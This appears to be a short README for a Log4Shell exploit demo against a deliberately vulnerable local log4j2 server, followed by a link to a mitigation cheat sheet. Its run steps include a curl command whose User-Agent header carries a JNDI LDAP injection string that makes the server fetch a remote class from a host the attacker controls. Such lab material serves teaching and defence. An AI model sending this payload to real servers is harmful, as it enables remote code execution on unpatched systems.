Exploit for one more log4j2 (Log4Shell) vulnerable server

The server itself: https://github.com/Kirill89/log4shell-vulnerable-server

Java 8 is required.

Execute

You need to run the vulnerable server in the docker container first.

./gradlew app:run
curl http://localhost:8000
curl --user-agent '${jndi:ldap://host.docker.internal:9999/Evil}' http://localhost:8000
curl http://localhost:8000

Log4Shell mitigation cheat sheet

https://snyk.io/blog/log4shell-remediation-cheat-sheet/